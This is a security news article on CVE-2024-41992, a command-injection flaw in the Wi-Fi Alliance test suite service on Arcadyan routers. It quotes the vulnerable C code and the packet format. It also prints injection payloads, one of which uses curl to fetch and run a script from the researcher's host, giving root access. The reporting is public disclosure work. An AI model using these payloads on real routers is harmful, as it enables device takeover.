A critical zero-day vulnerability has been discovered in the Arcadyan FMIMG51AX000J model and other devices belonging to the WiFi Alliance. The flaw allows remote attackers to execute arbitrary code.
An independent security researcher working with SSD Secure Disclosure identified the vulnerability, which is tracked as CVE-2024-41992.
Despite contacting the Wi-Fi Alliance via CERT VINCE in April 2024 (Case VU#123336), no clear timeline for a fix has been provided.
Therefore, the researchers decided to publicize the issue to warn users, even though a solution is not yet available.
“We contacted the WiFi Alliance via CERT VINCE (Case VU#123336) several months later, in April 2024, but due to lack of clarity on when a fix was scheduled to be released (by either vendors or the WiFi Alliance), we decided to release this advisory to inform the public of this vulnerability without being able to provide a fix,” the SSD Secure Disclosure team said.
Technical details
The researcher ran a network scan using Nmap on the router and identified ports 8000 and 8080 as open.
Nmap was unable to identify any services running on these ports, but upon investigation, we found responses indicating the presence of a “DUT-Wi-FiTestSuite” service.
##############################NEXT PROBE##############################
Probe TCP wfa_dut q|\x01\x00\x00\x00|
rarity 1
ports 8000,8080
match wfa_dut m|^\x01\x00\x08\x02\x04\x00\x00\x00\x00\x00\x00\x00DUT-Wi-FiTestSuite-|The service is a testing utility developed by the Wi-Fi Alliance to test routers and is not typically found on production devices.
The service listens for packets in a specific format called Type-Length-Value (TLV), a packet structure that consists of 2 bytes of type, 2 bytes of length, and a value ranging from 0 to 640 bytes.
The data is sent in big endian format but processed in little endian format on the device. The service has a list of functions that can be called with these packets.
For example, to get the version of the Wi-Fi test suite, send a packet with type value “1” and length “0”.
I looked into whether it’s possible to use this service to execute commands, and it is, although limited, possible.
function wfaDecodeTLV Decodes the received packet and extracts the type, length, and value. wfaStaGetIpConfiguses the parameters in these packets to execute system commands, for example using the first 16 bytes of the parameters to format and execute the command.
It turns out that it’s possible to inject commands, but with significant limitations: you can inject short commands by crafting a packet of a specific type and length.
For example, the value $(sleep 5)you can execute a sleep command, but the length of the command is limited to 13 characters due to the 16-byte parameter space.
Although the service allows command execution, the length of the commands that can be injected is short, limiting its potential for exploitation.
This makes more complex exploits more difficult to carry out, but highlights the potential security risk of having this service in exposed environments.
Protect your business with Cynet Managed All-in-One Cybersecurity Platform – Try a Free Trial
Exploitability
While character restrictions limited early attempts at command injection, the researchers wfaTGSendPing The functionality allows for a wider range of uses.
//In wfa_tg.h
//#define IPV6_ADDRESS_STRING_LEN 40
typedef struct _tg_ping_start
{
char dipaddr[IPV6_ADDRESS_STRING_LEN]; /* destination/remote ip address */
int frameSize;
float frameRate;
int duration;
int type;
int qos;
int iptype;
int dscp;
} tgPingStart_t;By taking advantage of the longer IPv6 address fields, an attacker can execute complex commands and take control of the device.
if (staPing->iptype == 2)
{
if ( tos>0)
sprintf(cmdStr, "echo streamid=%i > /tmp/spout_%d.txt;wfaping6.sh %s %s -i %f -c %i -Q %d -s %i -q >> /tmp/spout_%d.txt 2>/dev/null",
streamid,streamid,bflag, staPing->dipaddr, *interval, totalpkts, tos, staPing->frameSize,streamid);
else
sprintf(cmdStr, "echo streamid=%i > /tmp/spout_%d.txt;wfaping6.sh %s %s -i %f -c %i -s %i -q >> /tmp/spout_%d.txt 2>/dev/null",
streamid,streamid,bflag, staPing->dipaddr, *interval, totalpkts, staPing->frameSize,streamid);
sret = system(cmdStr);Researchers can leverage binaries already present on targeted systems for broader exploitation.
You can execute remote commands by sending specific packets. The packet has the following structure: type (2 = 0x02), length (33 = 0x21), and a value which is the command: '$(sh -c "$(curl 192.168.1.247:4)")'.
In parallel, we run a Python server on the machine that serves several components: a bash script that downloads and configures Dropbear, the Dropbear binary, and the dropbearkey binary.
Additionally, the server is configured to output POST requests to the console for debugging purposes. This configuration allows full root access to the system, and the researcher has published the full exploit here.
This vulnerability highlights the importance of robust security measures in IoT and networked devices. Users of affected models are advised to monitor for firmware updates and apply patches as soon as they are available. In the meantime, we encourage you to ensure the security of your network access and monitor for unusual activity.
Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN -14-day free trial
